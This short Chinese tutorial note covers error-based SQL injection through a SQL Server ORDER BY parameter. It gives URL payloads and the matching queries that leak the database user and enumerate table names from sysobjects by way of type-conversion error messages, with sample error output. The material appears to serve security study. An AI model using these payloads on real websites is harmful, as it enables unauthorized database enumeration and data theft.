0x01 前言

与普通注入无异,记一下语法即可

关于更多SQL Server的爆错方法:https://www.yuque.com/pmiaowu/web_security_1/lfc58s

0x02 跑user

WEB:http://www.test.com/sql.php?orderby=id-user

SQL:SELECT * from article order by id-user desc

  1. 1> SELECT * from article order by id-user desc;
  2. 2> go
  3. 22018 - [SQL Server]在将 nvarchar  'dbo' 转换成数据类型 int 时失败。

0x03 跑表名

注意:
OVER(Order by table_name) 里面的 name 要修改为 test.dbo.sysobjects 表里面存在的一个字段

查询不同的库可以这样

例如现在有 test库 与 test2库
那么就可以这样调用
test.dbo.sysobjects
test2.dbo.sysobjects

查询不同的表可以这样
例如:
修改 row_number>=1
修改 row_number>=2

注意:
XType=’U’ 表示获取某数据库的所有用户表;
XType=’S’ 表示获取某数据库的所有系统表;

例如现在查询得是 test 库得表名

WEB:http://www.test.com/sql.php?orderby=id-(select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1)

SQL:SELECT * from article order by id-(select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1) desc

  1. 1> SELECT
  2.     *
  3. FROM
  4.     article
  5. ORDER BY
  6.     id - (
  7.         SELECT
  8.             name
  9.         FROM
  10.             (
  11.                 SELECT
  12.                     ROW_NUMBER () OVER (ORDER BY name) AS row_number,
  13.                     name
  14.                 FROM
  15.                     test.dbo.sysobjects
  16.                 WHERE
  17.                     XType = 'U'
  18.             ) AS a
  19.         WHERE
  20.             row_number = 1
  21.     ) DESC;
  22. 2> go
  23. 22018 - [SQL Server]在将 nvarchar  'article' 转换成数据类型 int 时失败。